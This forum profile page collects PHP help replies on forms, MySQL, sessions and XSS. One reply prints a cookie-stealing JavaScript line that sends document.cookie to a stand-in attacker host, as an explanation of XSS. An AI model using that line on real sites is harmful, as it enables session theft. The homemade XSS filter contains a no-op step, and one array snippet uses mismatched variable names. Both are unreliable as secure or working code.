Daniel0
Staff Alumni
Posts: 11,885
Everything posted by Daniel0
-
How to grab email addresses from an email address book?
Daniel0 replied to a topic in Application Design
What address book? An address book on an online webmail service (like Gmail) or an application on your computer (like Microsoft Outlook's address book)?
-
This will work:
[code]
<?php
// Escape the session value before interpolating it into the query
$username = mysql_real_escape_string($_SESSION['username']);
$query = $config->query("SELECT * FROM $table_users WHERE username='$username'");
$row = mysql_fetch_array($query);

$sexes = array('Male', 'Female');
echo "<select name='sex'>\n";
foreach ($sexes as $sex) {
    // Recompute on every iteration so only the stored value is marked selected
    $selected = ($sex == $row['sex']) ? " selected='selected'" : null;
    echo "\t<option value='{$sex}'{$selected}>{$sex}</option>\n";
}
echo "</select>\n";
?>
[/code]
-
Very Confused -- Simple Program to Read Files and Compare
Daniel0 replied to JohnOlivier's topic in PHP Coding Help
Could we see a sample file of the ones you load?
-
Interfaces are sort of like templates for classes (PHP5 or higher only). When a class implements an interface, then it must contain the elements that the interface contains. [url=http://php.net/manual/en/language.oop5.interfaces.php]More info on interfaces[/url]
-
I believe that they are working on it as I think the entire main site is being rebuilt or something like that.
-
[quote author=pedrobcabral link=topic=110976.msg449433#msg449433 date=1160419559]
Is that also prevented with the command spoken above?
[/quote]
No. For that you would have to do something like this:
[code]
$t = html_entity_decode($t, ENT_QUOTES);
$t = str_replace("<", "&lt;", $t);
$t = str_replace(">", "&gt;", $t);
$t = str_replace('"', htmlspecialchars('"'), $t);
$t = preg_replace("/&#0*([0-9]*);?/", '&#\\1;', $t);
$t = str_replace('javascript:', 'javascript:', $t);
$t = preg_replace("/javascript:/i", "nojava"/*ava*/."script:", $t);
$t = preg_replace("/vbscript:/i", "novb"/*b*/."script:", $t);
[/code]
More info on XSS prevention: http://blog.bitflux.ch/wiki/XSS_Prevention
-
No, but use what corresponds to your database structure.
-
Try [tt]session_cache_limiter('none')[/tt] or [tt]session_cache_limiter('nocache')[/tt] on log-off.php
-
It is related. Each time I get that error on SMF I get errors similar to the ones you showed on the main page.
-
Inside the loop:
[code]
$selected = $row['is_selected'] ? " selected='selected'" : null;
// Array elements inside a double-quoted string need {} when the key is quoted
echo "\n<option value='{$row['id']}'{$selected}>{$row['name']}</option>\n";
[/code]
-
[quote author=Mutley link=topic=110976.msg449407#msg449407 date=1160417975]
Not heard of XSS, is it common?
[/quote]
Yeah, it's beginning to get quite common. It works like this:
1. User gets redirected to hacker's page. Could be like this (javascript):
[code]location.href='http://evil-hackers-site.com/harvest_cookies.php?data='+document.cookie;[/code]
2. The page harvests the cookie information
3. The user is redirected back to the original page.
Here is some information about XSS:
http://ha.ckers.org/xss.html
http://en.wikipedia.org/wiki/Cross_site_scripting
-
Do you run that code when defining the session variable or at every page load?
-
mysql_real_escape_string would prevent SQL injection. Another thing you need to be wary about is XSS (cross-site scripting) attacks.
-
What error do you get?
-
If you don't already do this, then maybe using persistent connections could take a bit off the MySQL server load.
-
How to tell if there are no results returned give an error
Daniel0 replied to ivalea's topic in PHP Coding Help
[code]
if (mysql_num_rows($result)) {
    while ($row = mysql_fetch_assoc($result)) {
        // do stuff
    }
} else {
    echo "No such customer";
}
[/code]
-
Not checking for the field names would be a security issue. Imagine a user registration script like this. Say there is another field called is_admin which defaults to 0 (false) and therefore is not included in the query as it is not needed. The user could send an extra post variable called is_admin with the value 1 (true) and thereby gain administrative rights.
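Added example, not part of Daniel0's post: the registration case described above, with an insert that takes column names from the request next to one that checks them against a fixed list. The table layout, the field names and the in-memory SQLite database are assumptions made for the demo.

```php
<?php
// Constructed demo: in-memory SQLite stands in for the real user table.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE users (username TEXT, email TEXT,
           password_hash TEXT, is_admin INTEGER NOT NULL DEFAULT 0)");
// Columns a registration request may set (hypothetical names).
const REGISTRATION_FIELDS = ['username', 'email', 'password_hash'];

function run_insert(PDO $db, array $cols, array $values): void {
    $marks = implode(', ', array_fill(0, count($cols), '?'));
    $sql = 'INSERT INTO users (' . implode(', ', $cols) . ") VALUES ($marks)";
    $db->prepare($sql)->execute($values);
}

// Before: column names come straight from the request, so is_admin gets through.
function insert_unchecked(PDO $db, array $post): void {
    run_insert($db, array_keys($post), array_values($post));
}

// After: the column list is fixed server-side; unknown or missing fields are rejected.
function insert_checked(PDO $db, array $post): void {
    $unexpected = array_diff(array_keys($post), REGISTRATION_FIELDS);
    $missing = array_diff(REGISTRATION_FIELDS, array_keys($post));
    if ($unexpected || $missing) {
        throw new InvalidArgumentException('Bad field set: '
            . implode(', ', array_merge($unexpected, $missing)));
    }
    $values = array();
    foreach (REGISTRATION_FIELDS as $col) {
        $values[] = $post[$col];
    }
    run_insert($db, REGISTRATION_FIELDS, $values);
}
// Constructed request body carrying the extra is_admin field.
$post = array('username' => 'alice', 'email' => 'alice@example.test',
              'password_hash' => password_hash('constructed', PASSWORD_DEFAULT),
              'is_admin' => '1');
insert_unchecked($db, $post);
try {
    insert_checked($db, $post);
} catch (InvalidArgumentException $e) {
    echo "checked insert rejected: ", $e->getMessage(), "\n";
}
unset($post['is_admin']);
insert_checked($db, $post);
foreach ($db->query('SELECT username, is_admin FROM users') as $row) {
    echo $row['username'], ' is_admin=', $row['is_admin'], "\n";
}
```

Rejecting the whole request, rather than silently dropping the extra field, also leaves a clear signal to log when someone submits is_admin.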
-
I often (like every second/third day) get a message saying that smf can't connect to the database. I don't know if that is related to this.
-
.htaccess files have the same syntax (or whatever to call it) as the httpd.conf file.
[code]
bla bla
#this is a comment
bla bla
more configuration...
[/code]
-
Try this:
[code]
<?php
// Returns true when the trimmed value is shorter than $min or longer than $max
function out_of_range($value, $min = 6, $max = 15)
{
    $length = strlen(trim($value));
    return ($length < $min || $length > $max);
}

if (isset($_POST["submit"])) {
    $error_msg = array();
    if (out_of_range($_POST['name'])) {
        $error_msg[] = "Please enter a name between 6 to 15 characters long";
    }
    if (out_of_range($_POST['peak'])) {
        $error_msg[] = "Please enter a peak between 6 to 15 characters long";
    }
    if (out_of_range($_POST['offpeak'])) {
        $error_msg[] = "Please enter an off peak between 6 to 15 characters long";
    }
    if (out_of_range($_POST['peaknet'])) {
        $error_msg[] = "Please enter a peaknet between 6 to 15 characters long";
    }
    if (out_of_range($_POST['offpeaknet'])) {
        $error_msg[] = "Please enter an offpeaknet between 6 to 15 characters long";
    }
    if (out_of_range($_POST['txt'])) {
        $error_msg[] = "Please enter a txt between 6 to 15 characters long";
    }
    if (out_of_range($_POST['picture'])) {
        $error_msg[] = "Please enter a picture between 6 to 15 characters long";
    }

    if (count($error_msg) <= 0) {
        // Connect first: mysql_real_escape_string() needs an open connection
        $connection = mysql_connect("", "", "");
        mysql_select_db("neil", $connection) or die("Unable to select database: ".mysql_error());

        $name = mysql_real_escape_string($_POST["name"]);
        $peak = mysql_real_escape_string($_POST["peak"]);
        $offpeak = mysql_real_escape_string($_POST["offpeak"]);
        $peaknet = mysql_real_escape_string($_POST["peaknet"]);
        $offpeaknet = mysql_real_escape_string($_POST["offpeaknet"]);
        $txt = mysql_real_escape_string($_POST["txt"]);
        $picture = mysql_real_escape_string($_POST["picture"]);

        mysql_query("INSERT INTO sims VALUES ('','$name','$peak','$peaknet','$offpeaknet','$offpeak','$txt','$picture')") or die(mysql_error());
        mysql_close($connection);
        echo "New sim successfully created";
    } else {
        echo "<span style='font-weight: bold; color: red;'>Error(s):</span><br /><ul><li>";
        echo join('</li><li>', $error_msg);
        echo "</li></ul>";
    }
} else {
    // show form
}
?>
[/code]
-
Change
[code]array_push($data, $sourcename=>array("cases"=>"0","inds"=>"0"));[/code]
to
[code]
$sourcename = array_merge($source_name,array("cases"=>"0","inds"=>"0"));
array_push($data, $sourcename);
[/code]
-
In my opinion you shouldn't even use tables for this purpose as tables are for tabular data.
-
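Try something like this (I haven't tested it):
[code]
<?php
// Map of image file name (without extension) => smiley code
$smileys = array(
    'smile'   => ':)',
    'smiley2' => ':D',
);

// Build the replacement <img> tags in the same order as the codes
$images = array();
foreach ($smileys as $image => $code) {
    $images[] = "<img src='smileys/{$image}.gif' alt='{$code}' />";
}

$text = str_replace($smileys, $images, $text);
?>
[/code]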
-